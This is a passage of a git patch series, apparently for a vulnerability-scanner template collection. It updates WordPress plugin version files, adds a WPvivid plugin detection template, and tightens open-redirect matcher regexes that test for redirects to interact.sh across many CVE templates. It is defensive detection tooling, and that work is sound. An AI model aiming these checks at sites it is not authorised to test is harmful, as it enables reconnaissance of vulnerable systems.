b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -3.22 \ No newline at end of file +3.23 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index 96d771776b..7f04bb11e3 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -2.8.1 \ No newline at end of file +2.8.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index 0413736d69..4cc0e35cb3 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.5.4 \ No newline at end of file +5.6.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index d003324bf6..9c25f93c64 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.0.12 \ No newline at end of file +3.0.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index 089d189c55..8cbad10cc0 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.94.0 \ No newline at end of file +1.95.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index ee7380d66e..462d212d88 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -15.2.2 \ No newline at end of file +15.2.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index a99de22da7..4ffb4e1938 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.0.17 \ No newline at end of file +3.0.19 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 1163055e28..cfacfe4080 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.7.0 \ No newline at end of file +4.7.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 3136debba1..cd61825f81 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.9.49 \ No newline at end of file +4.9.50 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index b616717999..6b0e58e78f 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -7.4.0 \ No newline at end of file +7.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index 6c0273036c..00f29d8a93 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -20.1 \ No newline at end of file +20.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-migrate-db.txt b/helpers/wordpress/plugins/wp-migrate-db.txt index b8d12d7371..bd4053bfb1 100644 --- a/helpers/wordpress/plugins/wp-migrate-db.txt +++ b/helpers/wordpress/plugins/wp-migrate-db.txt @@ -1 +1 @@ -2.6.1 \ No newline at end of file +2.6.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index 6482d6f0c3..f43c0d5265 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.8.0.1 \ No newline at end of file +1.8.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpvivid-backuprestore.txt b/helpers/wordpress/plugins/wpvivid-backuprestore.txt new file mode 100644 index 0000000000..cffa7a6e04 --- /dev/null +++ b/helpers/wordpress/plugins/wpvivid-backuprestore.txt @@ -0,0 +1 @@ +0.9.83 \ No newline at end of file diff --git a/technologies/wordpress/plugins/elementskit-lite.yaml b/technologies/wordpress/plugins/elementskit-lite.yaml index 29dd80c162..089ed23cb3 100644 --- a/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/technologies/wordpress/plugins/elementskit-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-elementskit-lite info: - name: ElementsKit Elementor Addons and Templates Library Detection + name: ElementsKit Elementor addons Detection author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/technologies/wordpress/plugins/wpvivid-backuprestore.yaml new file mode 100644 index 0000000000..ba70974c43 --- /dev/null +++ b/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -0,0 +1,49 @@ +id: wordpress-wpvivid-backuprestore + +info: + name: Migration, Backup, Staging – WPvivid Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wpvivid-backuprestore/ + metadata: + plugin_namespace: wpvivid-backuprestore + wpscan: https://wpscan.com/plugin/wpvivid-backuprestore + tags: tech,wordpress,wp-plugin,top-200 + +requests: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/wpvivid-backuprestore/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/wpvivid-backuprestore.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' From 71fd3bf9738f0b917d3bd16409f0790b21120cc6 Mon Sep 17 00:00:00 2001 From: Jorian Woltjer Date: Wed, 1 Mar 2023 09:39:14 +0100 Subject: [PATCH 24/84] Reduce false-positives in open-redirect regexes --- cves/2009/CVE-2009-5020.yaml | 2 +- cves/2015/CVE-2015-4668.yaml | 2 +- cves/2015/CVE-2015-5354.yaml | 2 +- cves/2016/CVE-2016-3978.yaml | 2 +- cves/2017/CVE-2017-12138.yaml | 2 +- cves/2018/CVE-2018-1000671.yaml | 2 +- cves/2018/CVE-2018-11784.yaml | 3 +-- cves/2018/CVE-2018-12300.yaml | 2 +- cves/2018/CVE-2018-14474.yaml | 2 +- cves/2018/CVE-2018-14931.yaml | 2 +- cves/2018/CVE-2018-16761.yaml | 2 +- cves/2019/CVE-2019-1010290.yaml | 2 +- cves/2019/CVE-2019-3912.yaml | 2 +- cves/2019/CVE-2019-9915.yaml | 2 +- cves/2020/CVE-2020-13121.yaml | 2 +- cves/2020/CVE-2020-18268.yaml | 2 +- cves/2020/CVE-2020-36365.yaml | 2 +- cves/2021/CVE-2021-22873.yaml | 2 +- cves/2021/CVE-2021-24358.yaml | 2 +- cves/2021/CVE-2021-24838.yaml | 2 +- cves/2021/CVE-2021-25028.yaml | 2 +- cves/2021/CVE-2021-25033.yaml | 2 +- cves/2021/CVE-2021-25074.yaml | 2 +- cves/2021/CVE-2021-25111.yaml | 2 +- cves/2021/CVE-2021-32618.yaml | 2 +- cves/2021/CVE-2021-46379.yaml | 2 +- cves/2022/CVE-2022-0692.yaml | 2 +- cves/2022/CVE-2022-28923.yaml | 2 +- cves/2022/CVE-2022-29272.yaml | 2 +- cves/2022/CVE-2022-32444.yaml | 2 +- vulnerabilities/generic/open-redirect.yaml | 2 +- vulnerabilities/other/otobo-open-redirect.yaml | 2 +- vulnerabilities/other/pollbot-redirect.yaml | 2 +- vulnerabilities/wordpress/age-gate-open-redirect.yaml | 2 +- vulnerabilities/wordpress/music-store-open-redirect.yaml | 2 +- vulnerabilities/wordpress/newsletter-open-redirect.yaml | 2 +- vulnerabilities/wordpress/wp-security-open-redirect.yaml | 2 +- 37 files changed, 37 insertions(+), 38 deletions(-) diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml index 6e9cbc2706..8ae7e433a1 100644 --- a/cves/2009/CVE-2009-5020.yaml +++ b/cves/2009/CVE-2009-5020.yaml @@ -26,6 +26,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/02/13 diff --git a/cves/2015/CVE-2015-4668.yaml b/cves/2015/CVE-2015-4668.yaml index bb969c4ac2..6030ff29b8 100644 --- a/cves/2015/CVE-2015-4668.yaml +++ b/cves/2015/CVE-2015-4668.yaml @@ -27,6 +27,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/09/30 diff --git a/cves/2015/CVE-2015-5354.yaml b/cves/2015/CVE-2015-5354.yaml index f20d2dfa3f..69b444e6e4 100644 --- a/cves/2015/CVE-2015-5354.yaml +++ b/cves/2015/CVE-2015-5354.yaml @@ -26,6 +26,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/07/22 diff --git a/cves/2016/CVE-2016-3978.yaml b/cves/2016/CVE-2016-3978.yaml index eb558a9845..58abdd8c0b 100644 --- a/cves/2016/CVE-2016-3978.yaml +++ b/cves/2016/CVE-2016-3978.yaml @@ -25,6 +25,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/08/12 diff --git a/cves/2017/CVE-2017-12138.yaml b/cves/2017/CVE-2017-12138.yaml index 924d872ac1..0869d0a754 100644 --- a/cves/2017/CVE-2017-12138.yaml +++ b/cves/2017/CVE-2017-12138.yaml @@ -35,6 +35,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/13 diff --git a/cves/2018/CVE-2018-1000671.yaml b/cves/2018/CVE-2018-1000671.yaml index d6302807a8..38965598b4 100644 --- a/cves/2018/CVE-2018-1000671.yaml +++ b/cves/2018/CVE-2018-1000671.yaml @@ -28,6 +28,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/08/18 diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml index 32c6ca3011..846bf1af34 100644 --- a/cves/2018/CVE-2018-11784.yaml +++ b/cves/2018/CVE-2018-11784.yaml @@ -26,7 +26,6 @@ requests: matchers: - type: regex regex: - - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh" + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 part: header - # Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml index 7dafab0bbb..91e9bd0964 100644 --- a/cves/2018/CVE-2018-12300.yaml +++ b/cves/2018/CVE-2018-12300.yaml @@ -25,6 +25,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/13 diff --git a/cves/2018/CVE-2018-14474.yaml b/cves/2018/CVE-2018-14474.yaml index d096ac5052..3b71bf0ca1 100644 --- a/cves/2018/CVE-2018-14474.yaml +++ b/cves/2018/CVE-2018-14474.yaml @@ -29,6 +29,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/13 diff --git a/cves/2018/CVE-2018-14931.yaml b/cves/2018/CVE-2018-14931.yaml index 6662301b79..1136c8a5f9 100644 --- a/cves/2018/CVE-2018-14931.yaml +++ b/cves/2018/CVE-2018-14931.yaml @@ -25,6 +25,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-16761.yaml b/cves/2018/CVE-2018-16761.yaml index 7f0883240e..7a4fe5efd3 100644 --- a/cves/2018/CVE-2018-16761.yaml +++ b/cves/2018/CVE-2018-16761.yaml @@ -28,6 +28,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/13 diff --git a/cves/2019/CVE-2019-1010290.yaml b/cves/2019/CVE-2019-1010290.yaml index 98fce55eb6..310b96bcc1 100644 --- a/cves/2019/CVE-2019-1010290.yaml +++ b/cves/2019/CVE-2019-1010290.yaml @@ -25,6 +25,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/13 diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml index 080ab85add..f8c272e0d8 100644 --- a/cves/2019/CVE-2019-3912.yaml +++ b/cves/2019/CVE-2019-3912.yaml @@ -27,6 +27,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/13 diff --git a/cves/2019/CVE-2019-9915.yaml b/cves/2019/CVE-2019-9915.yaml index 0a46dc948d..fd4c5762e4 100644 --- a/cves/2019/CVE-2019-9915.yaml +++ b/cves/2019/CVE-2019-9915.yaml @@ -33,6 +33,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 # Enhanced by md on 2022/10/13 diff --git a/cves/2020/CVE-2020-13121.yaml b/cves/2020/CVE-2020-13121.yaml index 08e8f14bfd..329e38c0d1 100644 --- a/cves/2020/CVE-2020-13121.yaml +++ b/cves/2020/CVE-2020-13121.yaml @@ -32,6 +32,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2023/02/08 diff --git a/cves/2020/CVE-2020-18268.yaml b/cves/2020/CVE-2020-18268.yaml index 52b839a8e7..7933297d12 100644 --- a/cves/2020/CVE-2020-18268.yaml +++ b/cves/2020/CVE-2020-18268.yaml @@ -37,6 +37,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/13 diff --git a/cves/2020/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml index b9ba68b772..6fa024476c 100644 --- a/cves/2020/CVE-2020-36365.yaml +++ b/cves/2020/CVE-2020-36365.yaml @@ -29,6 +29,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/14 diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml index d74f402d14..c8356a2e31 100644 --- a/cves/2021/CVE-2021-22873.yaml +++ b/cves/2021/CVE-2021-22873.yaml @@ -37,6 +37,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/14 diff --git a/cves/2021/CVE-2021-24358.yaml b/cves/2021/CVE-2021-24358.yaml index 8fca16aa7c..281f8c6b2c 100644 --- a/cves/2021/CVE-2021-24358.yaml +++ b/cves/2021/CVE-2021-24358.yaml @@ -31,7 +31,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 extractors: - type: regex diff --git a/cves/2021/CVE-2021-24838.yaml b/cves/2021/CVE-2021-24838.yaml index a19bab39ee..966af3c75b 100644 --- a/cves/2021/CVE-2021-24838.yaml +++ b/cves/2021/CVE-2021-24838.yaml @@ -30,7 +30,7 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - type: status status: diff --git a/cves/2021/CVE-2021-25028.yaml b/cves/2021/CVE-2021-25028.yaml index af42ce3c83..6215be74a1 100644 --- a/cves/2021/CVE-2021-25028.yaml +++ b/cves/2021/CVE-2021-25028.yaml @@ -25,6 +25,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/04/13 diff --git a/cves/2021/CVE-2021-25033.yaml b/cves/2021/CVE-2021-25033.yaml index f681ba8c96..5f071273dc 100644 --- a/cves/2021/CVE-2021-25033.yaml +++ b/cves/2021/CVE-2021-25033.yaml @@ -25,6 +25,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/04/13 diff --git a/cves/2021/CVE-2021-25074.yaml b/cves/2021/CVE-2021-25074.yaml index 4fd3f95ebc..30bb449f26 100644 --- a/cves/2021/CVE-2021-25074.yaml +++ b/cves/2021/CVE-2021-25074.yaml @@ -24,6 +24,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/04/21 diff --git a/cves/2021/CVE-2021-25111.yaml b/cves/2021/CVE-2021-25111.yaml index 42b2530141..8eb4830852 100644 --- a/cves/2021/CVE-2021-25111.yaml +++ b/cves/2021/CVE-2021-25111.yaml @@ -24,6 +24,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/14 diff --git a/cves/2021/CVE-2021-32618.yaml b/cves/2021/CVE-2021-32618.yaml index 1faa15b4ef..c3f4ccb55b 100644 --- a/cves/2021/CVE-2021-32618.yaml +++ b/cves/2021/CVE-2021-32618.yaml @@ -25,6 +25,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by md on 2022/10/14 diff --git a/cves/2021/CVE-2021-46379.yaml b/cves/2021/CVE-2021-46379.yaml index 270692bd08..9ff8273918 100644 --- a/cves/2021/CVE-2021-46379.yaml +++ b/cves/2021/CVE-2021-46379.yaml @@ -28,6 +28,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by cs 06/22/2022 diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml index 209d4d8f64..66d040fbd4 100644 --- a/cves/2022/CVE-2022-0692.yaml +++ b/cves/2022/CVE-2022-0692.yaml @@ -26,6 +26,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 # Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-28923.yaml b/cves/2022/CVE-2022-28923.yaml index 1c88625599..35c24dba0a 100644 --- a/cves/2022/CVE-2022-28923.yaml +++ b/cves/2022/CVE-2022-28923.yaml @@ -29,4 +29,4 @@ requests: - type: regex part: header regex: - - 